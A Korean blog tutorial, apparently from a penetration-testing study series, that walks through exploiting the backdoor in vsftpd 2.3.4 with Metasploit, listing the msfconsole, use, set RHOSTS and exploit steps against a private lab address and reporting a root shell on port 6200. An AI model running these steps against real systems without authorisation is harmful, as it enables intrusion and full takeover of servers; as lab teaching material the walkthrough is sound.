- [Linux] Server-Side Attack의 시작 (정보 수집 / 취약점 검색) 를 이어서 본격적으로 진행한다.
- 이전 글에서도 정보 수집 후 취약점을 발견하여 액세스 권한을 얻었다.
- 이번엔 서비스의 백도어 취약점을 바탕으로 서버의 전체 액세스 권한 탈취한다.
[Server-Side Attack으로 권한 취득하기#1]
1. 서비스 취약점 검색
- vsftpd는 Very Secure File Transfer Protocol Daemon의 약자.
- 보안이 취약한 FTP에 보안을 추가한 파일 전송 프로토콜
- TCP/IP 프로토콜을 기반으로 데이터를 송수신
- 보안을 강조한 서비스이더라도 취약점은 존재할 수 있으니 해당 버전을 찾아보려고 한다.
- 검색 결과 vsftpd 2.3.4 버전의 배포판은 백도어가 존재했다.
- Metasploit에서 모듈을 실행할 수 있도록 명령어를 기재해두었다.
2. Metasploit 실행
- 각종 서비스 / 운영체제의 취약점을 갖추어 해킹 테스트를 돕는 도구
- 기본 명령어
1) msfconsole - 프로그램 실행
2) show [WORD] - 여러가지 정보 출력
3) use [취약점 이름] - 해당 취약점을 이용
4) set [NAME] [IP] - [NAME]에 대한 [IP] 지정
5) expolit - 공격 수행
msfconsole
- 특정 그림이 나오면 정상적으로 실행한 것이다.
- 위에서는 적지 않은 명령어 search 다.
- metasploit 에 내장된 취약점들을 찾아볼 수 있다.
- 위에서 검색해본 vsftpd의 정보를 확인할 수 있다.
- 또 다른 명령어로는 info 다.
- 원하는 취약점에 대한 정보를 확인 할 수 있다.
use exploit/unix/ftp/vsfpd_234_backdoor
- 해당 취약점을 사용한다.
show options
- 취약점 선택 후 해당 취약점 관련 설정이 가능한 모드로 진입한다.
- 설정 전에 옵션들을 확인할 수 있다.
- RHOSTS에 공격 대상자의 IP를 설정해야한다.
set RHOSTS 192.168.111.131
- RHOSTS의 IP를 지정한다.
- show options로 다시 재 확인한다.
exploit
- 공격을 실행한다.
- 공격 실행 후, 셸을 찾았다는 이벤트 출력과 함께 vsftpd가 사용하는 포트 번호인 6200로 접속되었다.
- 접속 후, 완전한 권한(root 계정)을 얻었다.
'IT > ㄴ Gaining Access' 카테고리의 다른 글
[Linux] Veil으로 백도어 생성하기 [Client-Side Attack / 백도어] (0) | 2023.07.11 |
---|---|
[Linux] 백도어 생성 도구 Veil 설치 [Client-Side Attack] (0) | 2023.07.11 |
[Linux] 취약점 관리 프레임워크 Nexpose 설치 및 훑어보기 (0) | 2023.07.10 |
[Linux] Server-Side Attack으로 권한 취득하기 #2 (코드 실행 취약점 공격 / 원격 접속) (0) | 2023.07.08 |
[Linux] Server-Side Attack의 시작 (정보 수집 / 취약점 검색) (0) | 2023.07.07 |